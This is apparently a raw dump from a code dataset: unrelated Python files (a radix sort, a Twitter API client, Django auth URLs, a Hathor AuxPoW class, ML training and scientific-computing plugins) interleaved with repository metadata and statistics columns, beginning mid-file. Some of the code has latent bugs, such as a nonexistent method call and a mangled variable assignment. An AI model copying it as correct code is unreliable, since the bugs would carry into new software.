"color_simulated": color_sim,
"bgcolor_simulated": bgcolor_sim,
"style": style,
"selectors": {
"color": color_selector,
"background": bg_selector,
"style": style_selectors
}
}
if selected:
if self.special_colors['selectionForeground']['color']:
color = self.special_colors['selectionForeground']['color']
color_sim = color = self.special_colors['selectionForeground']['color_simulated']
style = ''
if self.special_colors['selection']['color']:
bgcolor = self.special_colors['selection']['color']
bgcolor_sim = color = self.special_colors['selection']['color_simulated']
return SchemeColors(
color, color_sim, bgcolor, bgcolor_sim, style,
color_selector, bg_selector, style_selectors
)
| 43.985714
| 120
| 0.60531
| 10,497
| 0.852306
| 0
| 0
| 0
| 0
| 0
| 0
| 4,695
| 0.381211
|
629f16a424f010c4c41e887a5a673cd1324c487c
| 820
|
py
|
Python
|
hadoop/hadoop/node.py
|
DropletProbe/shellscripts
|
d070eef24cd6003694d81a3bdc38f2097452c076
|
[
"MIT"
] | null | null | null |
hadoop/hadoop/node.py
|
DropletProbe/shellscripts
|
d070eef24cd6003694d81a3bdc38f2097452c076
|
[
"MIT"
] | null | null | null |
hadoop/hadoop/node.py
|
DropletProbe/shellscripts
|
d070eef24cd6003694d81a3bdc38f2097452c076
|
[
"MIT"
] | null | null | null |
import re
class Node:
def __init__(self, id, ip, hostname, type):
self.id = id
self.ip = ip
self.hostname = hostname
self.type = type
self.validate()
def validate(self):
self.illegal = False
if re.match("^(\d{1,3}\.){3}\d{1,3}$", self.ip):
self.illegal = reduce(lambda x, y : x and y, map(lambda x : True if int(x) <= 255 else False, self.ip.split(".")), True)
if self.illegal == False:
raise Exception("IP Format Error, " + self.ip + " is illegal.")
def __repr__(self):
return str(self)
def __str__(self):
return "<IP: %s, id: %s, hostname: %s, type: %s>" % (self.ip, self.id, self.hostname, self.type)
# if __name__ == "__main__":
# a = Node(1, "192.168.1.300", 1, 1)
# a.validate()
| 28.275862
| 132
| 0.540244
| 717
| 0.87439
| 0
| 0
| 0
| 0
| 0
| 0
| 189
| 0.230488
|
629facc04419dcfc8b14e0e646d18577710d3fd8
| 134
|
py
|
Python
|
Python/School/C7/q2.py
|
abdalrhmanyasser/Abdalrhman_Rep
|
e0fc3caa2cc04e92f591ccd7934586986d194000
|
[
"CC0-1.0"
] | null | null | null |
Python/School/C7/q2.py
|
abdalrhmanyasser/Abdalrhman_Rep
|
e0fc3caa2cc04e92f591ccd7934586986d194000
|
[
"CC0-1.0"
] | null | null | null |
Python/School/C7/q2.py
|
abdalrhmanyasser/Abdalrhman_Rep
|
e0fc3caa2cc04e92f591ccd7934586986d194000
|
[
"CC0-1.0"
] | null | null | null |
from random import *
l = []
for i in range(50):
l.append(randint(1, 100))
print(l)
for i in range(len(l)):
l[i] **= 2
print(l)
| 16.75
| 29
| 0.58209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
62a017f4ec169c103d6b2ccf1047abf661d12ee5
| 827
|
py
|
Python
|
code401challengespython/radix_sort/radix_sort.py
|
danhuyle508/data-structures-and-algorithms
|
476f32ebcde0350390e36d32e5dc7911ac9bab09
|
[
"MIT"
] | null | null | null |
code401challengespython/radix_sort/radix_sort.py
|
danhuyle508/data-structures-and-algorithms
|
476f32ebcde0350390e36d32e5dc7911ac9bab09
|
[
"MIT"
] | null | null | null |
code401challengespython/radix_sort/radix_sort.py
|
danhuyle508/data-structures-and-algorithms
|
476f32ebcde0350390e36d32e5dc7911ac9bab09
|
[
"MIT"
] | null | null | null |
import math
def radix_sort(arr):
if arr != []:
bucket_size = 10
maxLength = False
temp = -1
placement = 1
while not maxLength:
maxLength = True
buckets = [list() for i in range( bucket_size )]
#empty the arr
for i in arr:
temp = math.floor(i / placement)
buckets[temp % bucket_size].append( i )
if maxLength and temp > 0:
maxLength = False
a = 0
#append numbers back to arr in order
for b in range( bucket_size ):
buck = buckets[b]
for i in buck:
arr[a] = i
a += 1
placement *= bucket_size
return arr
return arr
| 28.517241
| 60
| 0.436518
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 50
| 0.060459
|
62a043b5cf107ad3ad2080e48c27d0e71c339360
| 4,232
|
py
|
Python
|
main_no_module.py
|
KMU-AELAB-AL/random
|
40c796cb6936742eace4651b1525ba6bea88b37d
|
[
"MIT"
] | null | null | null |
main_no_module.py
|
KMU-AELAB-AL/random
|
40c796cb6936742eace4651b1525ba6bea88b37d
|
[
"MIT"
] | null | null | null |
main_no_module.py
|
KMU-AELAB-AL/random
|
40c796cb6936742eace4651b1525ba6bea88b37d
|
[
"MIT"
] | null | null | null |
import os
import random
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
import torch.optim.lr_scheduler as lr_scheduler
from torch.utils.data.sampler import SubsetRandomSampler
from torchvision.datasets import CIFAR100, CIFAR10
from tqdm import tqdm
from config import *
from models.resnet import ResNet18
from data.transform import Cifar
random.seed('KMU_AELAB')
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True
transforms = Cifar()
if DATASET == 'cifar10':
data_train = CIFAR10('./data', train=True, download=True, transform=transforms.train_transform)
data_unlabeled = CIFAR10('./data', train=True, download=True, transform=transforms.test_transform)
data_test = CIFAR10('./data', train=False, download=True, transform=transforms.test_transform)
elif DATASET == 'cifar100':
data_train = CIFAR100('./data', train=True, download=True, transform=transforms.train_transform)
data_unlabeled = CIFAR100('./data', train=True, download=True, transform=transforms.test_transform)
data_test = CIFAR100('./data', train=False, download=True, transform=transforms.test_transform)
else:
raise FileExistsError
def train_epoch(model, criterion, optimizer, dataloaders):
model.train()
for data in tqdm(dataloaders['train'], leave=False, total=len(dataloaders['train'])):
inputs = data[0].cuda()
labels = data[1].cuda()
optimizer.zero_grad()
scores, features = model(inputs)
loss = criterion(scores, labels)
loss.backward()
optimizer.step()
def test(model, dataloaders, mode='val'):
model.eval()
total = 0
correct = 0
with torch.no_grad():
for (inputs, labels) in dataloaders[mode]:
inputs = inputs.cuda()
labels = labels.cuda()
scores, _ = model(inputs)
_, preds = torch.max(scores.data, 1)
total += labels.size(0)
correct += (preds == labels).sum().item()
return 100 * correct / total
def train(model, criterion, optimizer, scheduler, dataloaders, num_epochs):
print('>> Train a Model.')
checkpoint_dir = os.path.join(f'./trained', 'weights')
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
for epoch in range(num_epochs):
scheduler.step()
train_epoch(model, criterion, optimizer, dataloaders)
print('>> Finished.')
if __name__ == '__main__':
for trial in range(TRIALS):
fp = open(f'record_{trial + 1}.txt', 'w')
indices = list(range(NUM_TRAIN))
random.shuffle(indices)
labeled_set = indices[:INIT_CNT]
unlabeled_set = indices[INIT_CNT:]
train_loader = DataLoader(data_train, batch_size=BATCH,
sampler=SubsetRandomSampler(labeled_set),
pin_memory=True)
test_loader = DataLoader(data_test, batch_size=BATCH)
dataloaders = {'train': train_loader, 'test': test_loader}
model = ResNet18(num_classes=CLS_CNT).cuda()
torch.backends.cudnn.benchmark = False
for cycle in range(CYCLES):
criterion = nn.CrossEntropyLoss().cuda()
optimizer = optim.SGD(model.parameters(), lr=LR, momentum=MOMENTUM, weight_decay=WDECAY)
scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=MILESTONES)
train(model, criterion, optimizer, scheduler, dataloaders, EPOCH)
acc = test(model, dataloaders, mode='test')
fp.write(f'{acc}\n')
print('Trial {}/{} || Cycle {}/{} || Label set size {}: Test acc {}'.format(trial + 1, TRIALS, cycle + 1,
CYCLES, len(labeled_set), acc))
random.shuffle(unlabeled_set)
labeled_set += unlabeled_set[:ADDENDUM]
unlabeled_set = unlabeled_set[ADDENDUM:]
dataloaders['train'] = DataLoader(data_train, batch_size=BATCH,
sampler=SubsetRandomSampler(labeled_set),
pin_memory=True)
fp.close()
| 32.553846
| 119
| 0.629962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 287
| 0.067817
|
62a2a70bfd5dba6090a4f4d7e8ad09c40c0c9748
| 1,284
|
py
|
Python
|
deployment_scripts/python/modules/deploy_mgmt.py
|
Nexenta/fuel-plugin-nexentaedge
|
6cd55bdfd40b4e9e841834b4f8dac29f1684af8e
|
[
"Apache-2.0"
] | null | null | null |
deployment_scripts/python/modules/deploy_mgmt.py
|
Nexenta/fuel-plugin-nexentaedge
|
6cd55bdfd40b4e9e841834b4f8dac29f1684af8e
|
[
"Apache-2.0"
] | null | null | null |
deployment_scripts/python/modules/deploy_mgmt.py
|
Nexenta/fuel-plugin-nexentaedge
|
6cd55bdfd40b4e9e841834b4f8dac29f1684af8e
|
[
"Apache-2.0"
] | null | null | null |
import sys
from nexentaedge.utils import get_sid
from nexentaedge.nedgeConfigurator import NedgeMgmtConfigurator
from utils import get_iface_name_by_mac_from_list
from utils import get_deployment_config
def main():
# check nedge already installed and ready
if get_sid():
return
cfg = get_deployment_config()
plugin = cfg['fuel-plugin-nexentaedge']
replicast_name = get_iface_name_by_mac_from_list(plugin['replicast_macs'])
environment = {
'node_private_ip': '127.0.0.1',
'replicast_eth': replicast_name,
'nedge_node_count': 1,
'nedge_activation_key': plugin['activation_key'],
'nedge_cluster_name': plugin['cluster_name'],
'nedge_tenant_name': plugin['tenant_name'],
'nedge_bucket_name': plugin['bucket_name'],
'profile': plugin['profile'],
'nodocker': True,
'exclude': None,
'reserved': None
}
configurator = NedgeMgmtConfigurator(environment)
if not configurator.configure():
blockers = configurator.get_blockers()
if blockers:
print('blocked')
for blocker in blockers:
print(blocker)
sys.exit(1)
if __name__ == '__main__':
main()
| 29.181818
| 79
| 0.63785
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 346
| 0.26947
|
62a3ad6a413be7104ebcc620eae261f63aeb9314
| 1,234
|
py
|
Python
|
bookmarks/account/urls.py
|
dorotan/social
|
f78dc84554ef37c40f661ee1350bd3d5ade51d46
|
[
"Apache-2.0"
] | null | null | null |
bookmarks/account/urls.py
|
dorotan/social
|
f78dc84554ef37c40f661ee1350bd3d5ade51d46
|
[
"Apache-2.0"
] | null | null | null |
bookmarks/account/urls.py
|
dorotan/social
|
f78dc84554ef37c40f661ee1350bd3d5ade51d46
|
[
"Apache-2.0"
] | null | null | null |
from django.conf.urls import url
from django.contrib.auth import views as auth_views
from django.contrib.auth import views
from . import views
urlpatterns = [
#Custom login view
# url(r'^login/$', views.user_login, name='login'),
#Builtin login view
url(r'^login/$', auth_views.login, name='login'),
url(r'^edit/$', views.edit, name='edit'),
url(r'^logout/$', auth_views.logout, name='logout'),
url(r'^logout_then_login/$', auth_views.logout_then_login, name='logout_then_login'),
url(r'^$', views.dashboard, name='dashboard'),
url(r'^password_change/$', auth_views.password_change, name='password_change'),
url(r'^password_change/done/$', auth_views.password_change_done, name='password_change_done'),
url(r'^password_reset/$', auth_views.password_reset, name='password_reset'),
url(r'^password_reset/done/$', auth_views.password_reset_done, name='password_reset_done'),
url(r'^password_reset/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$', auth_views.password_reset_confirm, name='password_reset_confirm'),
url(r'^password_reset/complete/$', auth_views.password_reset_complete, name='password_reset_complete'),
url(r'^register/$', views.register, name='register'),
]
| 51.416667
| 143
| 0.71799
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 537
| 0.43517
|
62a3b336bd6bebedcff30395fd32342d7e3cb1c2
| 10,195
|
py
|
Python
|
examples/twitter.py
|
alex/remoteobjects
|
4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c
|
[
"BSD-3-Clause"
] | 1
|
2015-11-08T12:46:28.000Z
|
2015-11-08T12:46:28.000Z
|
examples/twitter.py
|
alex/remoteobjects
|
4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c
|
[
"BSD-3-Clause"
] | null | null | null |
examples/twitter.py
|
alex/remoteobjects
|
4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2009 Six Apart Ltd.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of Six Apart Ltd. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
A Twitter API client, implemented using remoteobjects.
"""
__version__ = '1.1'
__date__ = '17 April 2009'
__author__ = 'Brad Choate'
import httplib
from optparse import OptionParser
import sys
from urllib import urlencode, quote_plus
from urlparse import urljoin, urlunsplit
from httplib2 import Http
from remoteobjects import RemoteObject, fields, ListObject
class User(RemoteObject):
"""A Twitter account.
A User can be retrieved from ``http://twitter.com/users/show.json`` with
the appropriate ``id``, ``user_id``, or ``screen_name`` parameter.
"""
id = fields.Field()
name = fields.Field()
screen_name = fields.Field()
location = fields.Field()
description = fields.Field()
profile_image_url = fields.Field()
protected = fields.Field()
followers_count = fields.Field()
status = fields.Object('Status')
@classmethod
def get_user(cls, http=None, **kwargs):
url = '/users/show'
if 'id' in kwargs:
url += '/%s.json' % quote_plus(kwargs['id'])
else:
url += '.json'
query = urlencode(filter(lambda x: x in ('screen_name', 'user_id'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class DirectMessage(RemoteObject):
"""A Twitter direct message.
The authenticated user's most recent direct messages are at
``http://twitter.com/direct_messages.json``.
"""
id = fields.Field()
sender_id = fields.Field()
text = fields.Field()
recipient_id = fields.Field()
created_at = fields.Field()
sender_screen_name = fields.Field()
recipient_screen_name = fields.Field()
sender = fields.Object(User)
recipient = fields.Object(User)
def __unicode__(self):
return u"%s: %s" % (self.sender.screen_name, self.text)
class Status(RemoteObject):
"""A Twitter update.
Statuses can be fetched from
``http://twitter.com/statuses/show/<id>.json``.
"""
created_at = fields.Field()
id = fields.Field()
text = fields.Field()
source = fields.Field()
truncated = fields.Field()
in_reply_to_status_id = fields.Field()
in_reply_to_user_id = fields.Field()
in_reply_to_screen_name = fields.Field()
favorited = fields.Field()
user = fields.Object(User)
@classmethod
def get_status(cls, id, http=None):
return cls.get(urljoin(Twitter.endpoint, "/statuses/show/%d.json" % int(id)), http=http)
def __unicode__(self):
return u"%s: %s" % (self.user.screen_name, self.text)
class DirectMessageList(ListObject):
entries = fields.List(fields.Object(DirectMessage))
def __getitem__(self, key):
return self.entries.__getitem__(key)
@classmethod
def get_messages(cls, http=None, **kwargs):
url = '/direct_messages.json'
query = urlencode(filter(lambda x: x in ('since_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
@classmethod
def get_sent_messages(cls, http=None, **kwargs):
url = '/direct_messages/sent.json'
query = urlencode(filter(lambda x: x in ('since_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class UserList(ListObject):
entries = fields.List(fields.Object(User))
def __getitem__(self, key):
return self.entries.__getitem__(key)
@classmethod
def get_friends(cls, http=None, **kwargs):
return cls.get_related("friends", http=http, **kwargs)
@classmethod
def get_followers(cls, http=None, **kwargs):
return cls.get_related("followers", http=http, **kwargs)
@classmethod
def get_related(cls, relation, http=None, **kwargs):
url = '/statuses/%s' % relation
if 'id' in kwargs:
url += '/%s.json' % quote_plus(kwargs['id'])
else:
url += '.json'
query = urlencode(filter(lambda x: x in ('screen_name', 'user_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class Timeline(ListObject):
entries = fields.List(fields.Object(Status))
def __getitem__(self, key):
return self.entries.__getitem__(key)
@classmethod
def public(cls, http=None):
return cls.get(urljoin(Twitter.endpoint, '/statuses/public_timeline.json'), http=http)
@classmethod
def friends(cls, http=None, **kwargs):
query = urlencode(filter(lambda x: x in ('since_id', 'max_id', 'count', 'page'), kwargs))
url = urlunsplit((None, None, '/statuses/friends_timeline.json', query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
@classmethod
def user(cls, http=None, **kwargs):
url = '/statuses/user_timeline'
if 'id' in kwargs:
url += '/%s.json' % quote_plus(kwargs['id'])
else:
url += '.json'
query = urlencode(filter(lambda x: x in ('screen_name', 'user_id', 'since_id', 'max_id', 'page'), kwargs))
url = urlunsplit((None, None, url, query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
@classmethod
def mentions(cls, http=None, **kwargs):
query = urlencode(filter(lambda x: x in ('since_id', 'max_id', 'page'), kwargs))
url = urlunsplit((None, None, '/statuses/mentions.json', query, None))
return cls.get(urljoin(Twitter.endpoint, url), http=http)
class Twitter(Http):
"""A user agent for interacting with Twitter.
Instances of this class are full ``httplib2.Http`` HTTP user agent
objects, but provide convenient convenience methods for interacting with
Twitter and its data objects.
"""
endpoint = 'http://twitter.com/'
def public_timeline(self):
return Timeline.public(http=self)
def friends_timeline(self, **kwargs):
return Timeline.friends(http=self, **kwargs)
def user_timeline(self, **kwargs):
return Timeline.user(http=self, **kwargs)
def show(self, id):
return Status.get_status(id, http=self)
def user(self, id, **kwargs):
return User.get_user(http=self, **kwargs)
def mentions(self, **kwargs):
return Timeline.mentions(http=self, **kwargs)
def friends(self, **kwargs):
return UserList.get_friends(http=self, **kwargs)
def direct_messages_received(self, **kwargs):
return DirectMessageList.get_messages(http=self, **kwargs)
def direct_messages_sent(self, **kwargs):
return DirectMessageList.get_messages_sent(http=self, **kwargs)
def show_public(twitter):
print "## Public timeline ##"
for tweet in twitter.public_timeline():
print unicode(tweet)
def show_dms(twitter):
print "## Direct messages sent to me ##"
for dm in twitter.direct_messages_received():
print unicode(dm)
def show_friends(twitter):
print "## Tweets from my friends ##"
for tweet in twitter.friends_timeline():
print unicode(tweet)
def main(argv=None):
if argv is None:
argv = sys.argv
parser = OptionParser()
parser.add_option("-u", "--username", dest="username",
help="name of user for authentication")
parser.add_option("--public", action="store_const", const=show_public,
dest="action", default=show_public,
help="Show tweets from the public timeline")
parser.add_option("--dms", action="store_const", const=show_dms,
dest="action", help="Show DMs sent to you (requires -u)")
parser.add_option("--friends", action="store_const", const=show_friends,
dest="action", help="Show your friends' recent tweets (requires -u)")
opts, args = parser.parse_args()
twitter = Twitter()
# We'll use regular HTTP authentication, so ask for a password and add
# it in the regular httplib2 way.
if opts.username is not None:
password = raw_input("Password (will echo): ")
twitter.add_credentials(opts.username, password)
try:
print
opts.action(twitter)
print
except httplib.HTTPException, exc:
# The API could be down, or the credentials on an auth-only request
# could be wrong, so show the error to the end user.
print >>sys.stderr, "Error making request: %s: %s" \
% (type(exc).__name__, str(exc))
return 1
return 0
if __name__ == '__main__':
sys.exit(main())
| 32.059748
| 114
| 0.665326
| 6,400
| 0.627759
| 0
| 0
| 3,064
| 0.300539
| 0
| 0
| 3,495
| 0.342815
|
62a5341859cb97bf208e99d03085417e4406b355
| 1,119
|
py
|
Python
|
droxi/drox/write.py
|
andydude/droxtools
|
d608ceb715908fb00398c0d28eee74286fef3750
|
[
"MIT"
] | null | null | null |
droxi/drox/write.py
|
andydude/droxtools
|
d608ceb715908fb00398c0d28eee74286fef3750
|
[
"MIT"
] | null | null | null |
droxi/drox/write.py
|
andydude/droxtools
|
d608ceb715908fb00398c0d28eee74286fef3750
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# droxi
# Copyright (c) 2014, Andrew Robbins, All rights reserved.
#
# This library ("it") is free software; it is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; you can redistribute it and/or modify it under the terms of the
# GNU Lesser General Public License ("LGPLv3") <https://www.gnu.org/licenses/lgpl.html>.
from __future__ import absolute_import
import sys
import importlib
from .etree import etree
from .config import DEBUG
def drox_write(exp, fp=sys.stdout):
fp.write(drox_write_string(exp) + '\n')
def drox_write_tree(exp):
if DEBUG: print("write <= " + repr(exp))
if hasattr(exp, '__tree__'):
tree = exp.__tree__()
else:
name = '.'.join(type(exp).__module__.split('.')[:2])
modulename = name + '.writer'
#print("modulename = " + modulename)
lib = importlib.import_module(modulename)
tree = lib.Writer()(exp)
if DEBUG: print("write => " + repr(tree))
return tree
def drox_write_string(exp):
tree = drox_write_tree(exp)
return etree.tostring(tree)
| 31.971429
| 93
| 0.669348
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 471
| 0.420912
|
62a6aa5f52b205b9fb58d93a1dc26a90e2c69fff
| 5,224
|
py
|
Python
|
hathor/transaction/aux_pow.py
|
mbnunes/hathor-core
|
e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8
|
[
"Apache-2.0"
] | 51
|
2019-12-28T03:33:27.000Z
|
2022-03-10T14:03:03.000Z
|
hathor/transaction/aux_pow.py
|
mbnunes/hathor-core
|
e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8
|
[
"Apache-2.0"
] | 316
|
2019-09-10T09:20:05.000Z
|
2022-03-31T20:18:56.000Z
|
hathor/transaction/aux_pow.py
|
jansegre/hathor-core
|
22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd
|
[
"Apache-2.0"
] | 19
|
2020-01-04T00:13:18.000Z
|
2022-02-08T21:18:46.000Z
|
# Copyright 2021 Hathor Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, NamedTuple
from structlog import get_logger
from hathor import protos
logger = get_logger()
class BitcoinAuxPow(NamedTuple):
header_head: bytes # 36 bytes
coinbase_head: bytes # variable length (at least 47 bytes)
coinbase_tail: bytes # variable length (at least 18 bytes)
merkle_path: List[bytes] # each element has 32 bytes
header_tail: bytes # 12 bytes
@classmethod
def dummy(cls) -> 'BitcoinAuxPow':
""" Create a minimal valid AuxPOW.
"""
from hathor.merged_mining import MAGIC_NUMBER
return cls(b'\0' * 36, MAGIC_NUMBER, b'', [b'\0' * 32], b'\0' * 12)
def calculate_hash(self, base_block_hash: bytes) -> bytes:
""" Hash of the Bitcoin produced header, this is used for the block hash.
"""
from hathor.merged_mining.bitcoin import build_merkle_root_from_path, sha256d_hash
coinbase_tx_hash = sha256d_hash(self.coinbase_head + base_block_hash + self.coinbase_tail)
merkle_root = bytes(reversed(build_merkle_root_from_path([coinbase_tx_hash] + self.merkle_path)))
return sha256d_hash(self.header_head + merkle_root + self.header_tail)
def verify(self, _base_block_hash: bytes) -> None:
""" Check for inconsistencies, raises instance of TxValidationError on error.
"""
from hathor.merged_mining import MAGIC_NUMBER
from hathor.transaction.exceptions import AuxPowError
if not self.coinbase_head.endswith(MAGIC_NUMBER):
raise AuxPowError('cannot find MAGIC_NUMBER')
if MAGIC_NUMBER in self.coinbase_head[42:len(MAGIC_NUMBER)]: # 42 first bytes can be ignored
raise AuxPowError('multiple instances of MAGIC_NUMBER')
if len(self.merkle_path) > 12:
raise AuxPowError('`merkle_path` too long')
# XXX: is there anything else that needs to be verified?
def to_proto(self) -> protos.BitcoinAuxPow:
""" Create Protobuf instance, all values are copied.
"""
return protos.BitcoinAuxPow(
header_head=self.header_head,
coinbase_head=self.coinbase_head,
coinbase_tail=self.coinbase_tail,
merkle_path=self.merkle_path,
header_tail=self.header_tail,
)
@classmethod
def create_from_proto(cls, aux_pow_proto: protos.BitcoinAuxPow) -> 'BitcoinAuxPow':
""" Create a BitcionAuxPow instance from Protobuf.
"""
return cls(
header_head=aux_pow_proto.header_head,
coinbase_head=aux_pow_proto.coinbase_head,
coinbase_tail=aux_pow_proto.coinbase_tail,
merkle_path=list(aux_pow_proto.merkle_path),
header_tail=aux_pow_proto.header_tail,
)
def __bytes__(self) -> bytes:
""" Convert to byte representation.
| Size | Description | Comments |
|------|----------------------|----------|
| 36 | `header_head` | first 36 bytes of the header |
| 1+ | `coinbase_head` size | byte length of the next field |
| 47+ | `coinbase_head` | coinbase bytes before hash of `block_data` |
| 1+ | `coinbase_tail` size | byte length of the next field |
| 18+ | `coinbase_tail` | coinbase bytes after hash of `block_data` |
| 1+ | `merkle_path` count | the number of links on the `merkle_path` |
| 32+ | `merkle_path` | array of links, each one is 32 bytes long |
| 12 | `header_tail` | last 12 bytes of the header |
"""
from hathor.merged_mining.bitcoin import encode_bytearray, encode_list
struct_bytes = self.header_head
struct_bytes += encode_bytearray(self.coinbase_head)
struct_bytes += encode_bytearray(self.coinbase_tail)
struct_bytes += encode_list(self.merkle_path)
struct_bytes += self.header_tail
return struct_bytes
@classmethod
def from_bytes(cls, b: bytes) -> 'BitcoinAuxPow':
""" Convert bytes to class instance.
"""
from hathor.merged_mining.bitcoin import read_bytes, read_nbytes, read_varint
a = bytearray(b)
header_head = read_nbytes(a, 36)
coinbase_head = read_bytes(a)
coinbase_tail = read_bytes(a)
c = read_varint(a)
merkle_path = []
for _ in range(c):
merkle_path.append(bytes(a[:32]))
del a[:32]
header_tail = read_nbytes(a, 12)
return cls(
header_head,
coinbase_head,
coinbase_tail,
merkle_path,
header_tail,
)
| 41.460317
| 105
| 0.647205
| 4,526
| 0.866386
| 0
| 0
| 1,405
| 0.268951
| 0
| 0
| 2,083
| 0.398737
|
62a6cdcc5cf9bca5a11b6dc4e9f38e91015abe52
| 502
|
py
|
Python
|
cortex/export/__init__.py
|
mvdoc/pycortex
|
bc8a93cac9518e3c1cd89650c703f9f3814e805b
|
[
"BSD-2-Clause"
] | 423
|
2015-01-06T02:46:46.000Z
|
2022-03-23T17:20:38.000Z
|
cortex/export/__init__.py
|
mvdoc/pycortex
|
bc8a93cac9518e3c1cd89650c703f9f3814e805b
|
[
"BSD-2-Clause"
] | 243
|
2015-01-03T02:10:03.000Z
|
2022-03-31T19:29:48.000Z
|
cortex/export/__init__.py
|
mvdoc/pycortex
|
bc8a93cac9518e3c1cd89650c703f9f3814e805b
|
[
"BSD-2-Clause"
] | 136
|
2015-03-23T20:35:59.000Z
|
2022-03-09T13:39:10.000Z
|
from .save_views import save_3d_views
from .panels import plot_panels
from ._default_params import (
params_inflatedless_lateral_medial_ventral,
params_flatmap_lateral_medial,
params_occipital_triple_view,
params_inflated_dorsal_lateral_medial_ventral,
)
__all__ = [
"save_3d_views",
"plot_panels",
"params_flatmap_lateral_medial",
"params_occipital_triple_view",
"params_inflatedless_lateral_medial_ventral",
"params_inflated_dorsal_lateral_medial_ventral",
]
| 27.888889
| 52
| 0.804781
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 180
| 0.358566
|
62a72c2067d3b5d382112ffdbd4e31435a1725b9
| 1,456
|
py
|
Python
|
pyfr/plugins/dtstats.py
|
DengSonic/PyFR
|
dde524ed56f4a4feca376b51db4b21eb6fa4b113
|
[
"BSD-3-Clause"
] | 1
|
2020-06-23T16:37:06.000Z
|
2020-06-23T16:37:06.000Z
|
pyfr/plugins/dtstats.py
|
synthetik-technologies/PyFR
|
9d4d5e96a8a9d5ca47970ec197b251ae8b0ecdda
|
[
"BSD-3-Clause"
] | null | null | null |
pyfr/plugins/dtstats.py
|
synthetik-technologies/PyFR
|
9d4d5e96a8a9d5ca47970ec197b251ae8b0ecdda
|
[
"BSD-3-Clause"
] | 1
|
2020-08-21T02:50:17.000Z
|
2020-08-21T02:50:17.000Z
|
# -*- coding: utf-8 -*-
from pyfr.mpiutil import get_comm_rank_root
from pyfr.plugins.base import BasePlugin, init_csv
class DtStatsPlugin(BasePlugin):
name = 'dtstats'
systems = ['*']
formulations = ['std']
def __init__(self, intg, cfgsect, prefix):
super().__init__(intg, cfgsect, prefix)
self.flushsteps = self.cfg.getint(self.cfgsect, 'flushsteps', 500)
self.count = 0
self.stats = []
self.tprev = intg.tcurr
# MPI info
comm, rank, root = get_comm_rank_root()
# The root rank needs to open the output file
if rank == root:
self.outf = init_csv(self.cfg, cfgsect, 'n,t,dt,action,error')
else:
self.outf = None
def __call__(self, intg):
# Process the sequence of rejected/accepted steps
for i, (dt, act, err) in enumerate(intg.stepinfo, start=self.count):
self.stats.append((i, self.tprev, dt, act, err))
# Update the total step count and save the current time
self.count += len(intg.stepinfo)
self.tprev = intg.tcurr
# If we're the root rank then output
if self.outf:
for s in self.stats:
print(','.join(str(c) for c in s), file=self.outf)
# Periodically flush to disk
if intg.nacptsteps % self.flushsteps == 0:
self.outf.flush()
# Reset the stats
self.stats = []
| 29.12
| 76
| 0.581731
| 1,333
| 0.915522
| 0
| 0
| 0
| 0
| 0
| 0
